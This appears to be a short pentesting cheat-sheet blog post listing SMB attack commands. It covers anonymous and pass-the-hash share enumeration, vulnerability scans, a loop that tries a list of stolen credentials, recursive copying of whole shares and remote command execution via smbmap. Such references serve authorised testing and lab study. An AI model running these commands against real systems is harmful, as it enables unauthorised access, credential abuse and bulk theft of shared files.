Show shares with smbclient:
smbclient --no-pass -L //$target
smbclient -U guest //$target/
smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory
Show shares with other clients:
smbmap -R -H $target // No user
smbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // User
nmap -sV --script=smb-enum-shares -p445 $target
crackmapexec smb $target -u '' -p '' --shares
Vulnerability scan
nmap --script=smb-vul* -p445 $target proxychains4 nmap --script=smb-vul* -p445 -Pn -sT $target
Enumerate through an existing list of users and passwords:
for cred in $(cat other_users.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f 2 ) echo "$username / $password" smbmap -R -H $victim -u $username -p $password done;
Mount directory
mount -t cifs -o user=bob,domain=THINC.LOCAL,vers=1.0 //$target/Bob /mnt
Copy whole share with smbclient (other option for subdirectory):
smbclient '\\$target\sharename' -N -c 'prompt OFF;recurse ON;mget *'
Execute commands
smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target
See also the Impacket post
Connect to shares via cmd
Use the following to connect from a client to another client.
net use M: \\$target\share $password /u:$domain\$username
Afterwards, always disconnect!
net use \\$target /del
Show all drives:
net use
Leave a Reply
You must be logged in to post a comment.